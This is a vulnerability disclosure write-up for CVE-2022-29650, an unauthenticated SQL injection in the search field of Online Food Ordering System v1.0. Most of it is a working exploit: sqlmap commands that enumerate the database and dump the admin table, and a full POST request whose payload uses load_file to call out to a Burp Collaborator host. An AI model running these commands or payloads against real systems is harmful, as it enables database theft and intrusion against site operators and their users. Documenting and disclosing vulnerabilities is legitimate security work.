Headline
CVE-2022-29650: Online Food Ordering System Unauthenticated Sql Injection - HackMD
Online Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the Search parameter at /online-food-order/food-search.php.
# Online Food Ordering System Unauthenticated Sql Injection * Exploit Date: 4/18/2022 * Exploit Author: Nguyen Phu Hung (d4rkp0w4r) # Exploit * Injection Point => `Search` ![](https://i.imgur.com/7SaRKPz.jpg) * Use Burp Suite capture request then save as `food.txt` ![](https://i.imgur.com/RxxNRAR.png) * Use `Sqlmap` exploit databases ```python= python sqlmap.py -r food.txt -batch -current-db ``` ![](https://i.imgur.com/Ajuhaeu.png) ```python= python sqlmap.py -r food.txt -batch -D onlinefoodorder -tables ``` ![](https://i.imgur.com/u0b1253.png) ```python= python sqlmap.py -r food.txt -columns -D onlinefoodorder -T tbl_admin -dump ``` **Information Disclosure** ![](https://i.imgur.com/HcgSNbi.png) # Vulnerable Code ![](https://i.imgur.com/CC9MvzY.png) * No filter `search` when inserting data to database # POC * Request ```python= POST /online-food-order/food-search.php HTTP/1.1 Host: 192.168.1.101:8888 Origin: http://192.168.1.101:8888 Cookie: PHPSESSID=g4piuq3kkuno5h981rkgb3njva Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.101:8888/online-food-order/foods.php Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 140 search=373255’%2b(select%20load_file(‘%5c%5c%5c%5cmsio14xruabfnv9ja1936c9phgn9b8zz2nuaky9.burpcollaborator.net%5c%5cqtq’))%2b’&submit=Search ```